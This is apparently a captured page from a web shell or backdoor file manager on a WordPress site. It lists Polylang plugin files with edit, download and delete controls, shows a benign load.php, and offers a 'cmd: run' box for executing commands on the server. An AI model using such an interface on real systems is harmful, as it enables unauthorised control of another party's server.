/
home
/
techb158
/
on-time-movers.com
/
wp-content
/
plugins
/
polylang
/
src
/
integrations
/
wp-importer
/
/home/techb158/on-time-movers.com/wp-content/plugins/polylang/src/integrations/wp-importer
mkdir
upload
Name
Size
Mode
Actions
load.php
231
0644
edit
dl
rm
wordpress-importer.php
2185
0644
edit
dl
rm
wp-import.php
7354
0644
edit
dl
rm
Edit:
/home/techb158/on-time-movers.com/wp-content/plugins/polylang/src/integrations/wp-importer/load.php
(231B)
<?php /** * Loads the integration with WordPress Importer. * * @package Polylang */ if ( ! defined( 'ABSPATH' ) ) { exit; // Don't access directly. } PLL_Integrations::instance()->wp_importer = new PLL_WordPress_Importer();
Save
cmd:
run